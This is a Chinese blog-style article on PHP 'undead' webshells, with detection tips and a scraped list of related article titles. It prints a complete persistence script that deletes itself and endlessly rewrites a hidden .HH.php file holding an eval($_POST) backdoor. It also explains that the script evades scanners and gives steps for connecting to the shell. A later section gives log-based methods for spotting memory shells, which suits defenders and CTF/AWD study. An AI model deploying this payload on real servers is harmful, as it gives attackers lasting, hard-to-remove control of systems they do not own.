关于PHP不死马的分析和总结
PHP不死马是我们达到权限维持的目的。
不死马的原理:
由客户端发起的Web请求后,中间件的各个独立的组件如Listener
、Filter
、Servlet
等组件会在请求过程中做监听、判断、过滤等操作,内存马就是利用请求过程在内存中修改已有的组件或动态注册一个新的组件,插入恶意的shellcode
,达到持久化控制服务器的目的
PHP不死马:
<?php
ignore_user_abort(true);
set_time_limit(0);
@unlink(__FILE__);
$file = '.HH.php';
$code = '<?php @eval($_POST[\'c\']); ?>';
while (1){
file_put_contents($file,$code);
usleep(5000);
}
?>
set_time_limit()函数:设置允许脚本运行的时间,单位为秒(如果设置该运行时间,sleep()函数在执行程序时的持续时间将会被忽略掉)
ignore_user_abort()函数:函数设置与客户机断开是否会终止脚本的执行(如果设置为True,则忽略与用户的断开)
unlink(FILE)函数:删除文件(防止文件落地被检测工具查杀)
file_put_contents函数:将一个字符串写入该文件中
usleep函数:延迟执行当前脚本数微秒,即条件竞争
在访问PHP文件的话 会生成一个.HH.php文件,然后会把自身文件删除,然后就可以用菜刀连接.HH.php:
删除.HH.php文件的话他会不断生成 .HH.php
内存马的检测
内存马排查思路: 先判断是通过什么方法注入的内存马,可以先查看web日志是否有可疑的web访问日志,如果是filter或者listener类型就会有大量url请求路径相同参数不同的,或者页面不存在但是返回200的,查看是否有类似哥斯拉、冰蝎相同的url请求,哥斯拉和冰蝎的内存马注入流量特征与普通webshell的流量特征基本吻合。通过查找返回200的url路径对比web目录下是否真实存在文件,如不存在大概率为内存马。
如在web日志中并未发现异常,可以排查是否为中间件漏洞导致代码执行注入内存马,排查中间件的error.log日志查看是否有可疑的报错,根据注入时间和方法根据业务使用的组件排查是否可能存在java代码执行漏洞以及是否存在过webshell,排查框架漏洞,反序列化漏洞
关于PHP不死马的分析和总结相关推荐
- AWD-----监控不死马垃圾包资源库
1.知识: AWD规则: 2.防守-----流量监控-----实时获取访问数据包流量 利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效,也能确保分析到无后 ...
- 专访死马:为什么说Egg.js是企业级Node框架
在 7 月 6 日的 ArchSummit 架构师峰会深圳站上,Egg.js 的主要开发者不四(网名死马)将给参会者带来<企业级 Node.js Web 框架研发与落地>的分享,借此机会, ...
- 7.awd不死马权限维持及变种
不死马又叫内存马,就是运行一段永远不退出的程序常驻在PHP进程里,无限执行. 不死马.php->上传到server->server执行文件->server本地无限循环生成 (一句话. ...
- 渗透测试-不死马的创建和查杀
不死马的创建和查杀 文章目录 不死马的创建和查杀 0x00 创建 0x01 查看 0x02 查杀 root用户角度的查杀: 重启web服务. 其他用户的查杀: 0x00 创建 md5加密密码: 代码: ...
- 笔记本电脑计算机出现问题怎么办,笔记本电脑经常死机怎么办 笔记本电脑死机原因分析...
笔记本电脑经常死机 笔记本电脑死机原因分析: 笔记本电脑重启和死机故障现象是电脑维修过程中的经常出现问题,涉及的原因也是多方面的.经验告诉我笔记本电脑的重启.死机故障现象和机型牌子有一定的关系,一般要 ...
- 由Debuggerd导致的Android系统死机问题分析
1. 问题现象 问题发生的Android系统版本是7.0(Nougat): 屏幕没有任何刷新,输入事件无任何响应,即我们平时说的死机(冻屏): watchdog没有重启system_server: 问 ...
- Android死机问题分析
1. 死机/phong hang 定义 当手机长时间无法再被用户控制操作时,我们称为死机或者hang 机. 在这里我们强调长时间,如果是短时间,我们归结为Perfomance 问题,即性能问题. 2. ...
- 不死马php如何取证_AWD不死马与克制方法
一个简单的不死马如: ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = ' ...
- Windows权限维持之php不死马、映像劫持、策略组脚本
文中主要讲解Windows权限维持中的小技巧,通过了解掌握php不死马.映像劫持.策略组脚本等方式,更快知晓权限维持作用.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若 ...
最新文章
- caffe 的命令行训练与测试
- C语言交换两个数的值与形参与实参理解
- mysql @变量和变量的区别及怎么判断记录唯一性
- ASP.NET中常用功能代码总结(3)——上传图片到数据库
- 敏捷软件开发读书笔记2
- BZOJ 2115 Wc2011 Xor DFS+高斯消元
- 64位Ubuntu kylin 16.04 安装laptop mode解决关闭盖子无法唤醒,并解决安装此模式后鼠标间歇断电
- arcgis利用python赋值
- hbuilderx内置服务器启动失败_Nginx服务器简介与配置
- 前端界面根据条件动态显示图片
- 机器视觉——IC芯片字符检测打光实例
- 人们为什么使用计算机,人们为什么要用互联网
- emacs,objective-c mode 代码补全!
- SSM框架整合(xml配置)
- 【腾讯云技术沙龙预告】云端数据库的设计之美
- MATLAB运行cpp文件(从配置到运行)
- php风格模板,phpwind冷色调整站风格模板
- win10系统关机时提示(程序没有响应)需要结束程序
- Windows上利用Python自动切换代理IP的终极方案!
- Windows服务器时间不断修改(时间不同步已解决)